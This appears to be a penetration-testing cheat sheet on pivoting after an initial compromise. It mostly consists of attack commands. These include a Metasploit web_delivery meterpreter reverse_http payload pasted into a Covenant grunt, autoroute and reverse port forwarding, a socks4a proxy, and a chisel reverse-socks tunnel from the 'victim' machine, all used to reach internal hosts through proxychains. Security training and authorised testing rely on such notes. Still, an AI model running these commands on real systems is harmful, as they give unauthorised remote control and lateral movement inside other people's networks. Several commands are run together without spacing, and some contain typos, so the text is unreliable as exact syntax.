Pivoting
Metasploit
Check routes on a win machine
We need to see what other access has our target machine
route printarp -aNow that we have other interesting IPs we can try to reach those new ones
We can make a port scan on one of these IPs
use auxiliary/scanner/portscan/tcpset rhosts 10.0.2.5set ports 445runWe could of course have set more ports and this would be a cool nmap like tool.
Reverse port forwarding and Session Passing with Metasploit having initial shell on Covenant
We can assume that we have a shell with covenant for instance
We generate a payload with metasploit through web delivery (more stealthy because it can pass as http traffic)
use exploit/multi/script/web_deliveryset target 2(for powershell)set payload windows/x64/meterpreter/reverse_httpset lhost to your attacking machine
sel an lport
exploit -jNow we can copy the payload and paste to our grunt in Covenant
Metasploit should now have opened a session
We can choose an interface with
ipconfigrun autoroute -s 192.168.16.0/24We can check it's been done using
run autoroute -pWe can now set up a reverse port forward
portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IPWe can check it's been done using
portfwdwe can background our session with CTRL-Z
We will setup a socks proxy
use auxiliary/server/socks4aWe need to check our port in
/etc/proxychains4.confset srvport 9050we can check our jobs using
jobsWe can kill the web delivery one that we do not need anymore
jobs -k ID-OF-JOBWe now need to create a listener on covenant that will interact with the port forward set previously:
1 192.168.3.28:443 0.0.0.0:1234 ReverseBindAddress can stay at 0.0.0.0, BindPort should be 443, connectPort should be 1234 and connect address is the ip of our victime machine.
We should now be able to reach other machine in the network of the initial machine that has now route to our attacking machine using proxychains
Shuttle
Let's say you got shell on a machine and this machine has access local to another (let's call it machine 2). Shuttle will allow you to access machine 2 from your network and act as a proxy.
Chisel
If you have a shell on a machine that has a local port open you can forward this port to your machine using chisel, it is called port forwarding for instance in our example we want to forward to listen the port 445 of the target machine that is open locally. You will then be able to intract from your kali on your port 445:
Pivoting with Chisel
From my kali
chisel server --reverseFrom the victim machine
.\chisel.exe client IP-OF-KALI:8080 R:1080:socksIn your
etc/proxychains4.confadd this linesocks5 127.0.0.1 1080
Resources
Last updated
